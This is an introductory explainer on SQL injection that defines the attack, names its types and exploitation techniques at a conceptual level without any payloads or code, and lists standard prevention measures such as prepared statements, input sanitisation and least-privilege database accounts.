What is SQL Injection?
SQL injection is a technique where a malicious user can inject SQL commands into an SQL
Statement via a web page.
A successful SQL injection exploit can read sensitive data from the database,
Insert/Update/Delete database data, execute administration operations on the database (e.x.
shutdown the DBMS), recover the content of a given file present on the DBMS file system
and in some cases issue commands to the operating system.
SQL injection attacks are a type of injection attack, in which SQL commands are injected
into data-plane input in order to effect the execution of predefined SQL commands.
Types of SQL Injection
– In band
In band Sql Injection occurs when an attacker is able to use the same communication
channel to both launch the attack and results.
– Out of band
Out of band Sql Injection occurs when an attacker is unable to use the same
communication channel to both launch the attack and results.
– Blind SQLi
Blind Sql injection is a type of Sql injection attack that asks database true or false
questions and determines answer based on the application response.
SQL Injection Exploitation Technique
– Error based Exploitation
– Union based Exploitation
– Boolean based Exploitation
– Time-based Delay Exploitation
– Content-based Exploitation
How SQL Injection Work?
– App sends form to user
– Attacker submits form with SQL exploit data
– Application builds string with exploit data
– Application sends SQL query to Data Base
– Data Base executes query, including exploit, sends data back to application
– Application returns data to user.
What attacker can do with SQL Injection?
There are a number of things an attacker can do when exploiting an SQL injection on a
vulnerable website. Usually, it depends on the privileges of the user the web application uses
to connect to the database server. By exploiting an SQL injection vulnerability, an attacker
can:
– Add, delete, edit or read content in the database
– Read source code from files on the database server
– Write files to the database server
Bypass Authentication
It all depends on the capabilities of the attacker, but the exploitation of an SQL injection
the vulnerability can even lead to a complete takeover of the database and web server.
How to Prevent from SQL Injection Attack?
An organization can adopt the following policy to protect itself against SQL Injection attacks.
– User input should never be trusted – It must always be sanitized before it is used in
dynamic SQL statements.
– Stored procedures – these can encapsulate the SQL statements and treat all input as
parameters.
– Prepared statements –prepared statements to work by creating the SQL statement
first then treating all submitted user data as parameters. This has no effect on the
syntax of the SQL statement.
– Regular expressions –these can be used to detect potential harmful code and remove
it before executing the SQL statements.
– Database connection user access rights –only necessary access rights should be
given to accounts used to connect to the database. This can help reduce what the SQL
statements can perform on the server.
– Error messages –these should not reveal sensitive information and where exactly an
error occurred. Simple custom error messages such as “Sorry, we are experiencing
technical errors. The technical team has been contacted. Please try again later” can be
used instead of display the SQL statements that caused the error.